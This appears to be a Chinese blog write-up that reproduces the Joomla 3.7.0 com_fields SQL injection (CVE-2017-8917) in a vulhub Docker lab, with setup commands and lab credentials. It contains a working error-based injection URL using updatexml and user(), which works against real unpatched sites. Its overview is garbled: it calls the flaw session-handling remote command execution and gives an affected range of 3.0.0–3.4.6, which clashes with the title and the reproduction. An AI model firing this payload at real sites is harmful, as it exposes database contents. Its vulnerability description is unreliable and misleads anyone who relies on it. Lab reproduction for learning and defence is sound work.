Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

漏洞概述

信息填对后,会显示安装成功com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击

漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

影响范围:

Joomla 3.0.0-3.4.6

复现过程

这里使用3.7.0版本

使用vulhub

进入/joomla/CVE-2017-8917目录,启动docker

docker-compose build
docker-compose up -d

启动后访问 http://your-ip:8080即可看到Joomla的安装界面,当前环境的数据库信息为:

  • 数据库地址:mysql:3306
  • 用户:root
  • 密码:root
  • 数据库名:joomla

填入上述信息,正常安装即可。

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第1张图片

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第2张图片 信息填对后,会显示安装成功

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第3张图片

 删除installation目录

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第4张图片

重新访问后显示如下

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第5张图片

payload注入:

192.168.xxx.xxx:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

显示如下:

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第6张图片

也可输入version()、localhost()

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第7张图片

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞_第8张图片

 

 

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

你可能感兴趣的:(漏洞复现,docker,系统设置,安全)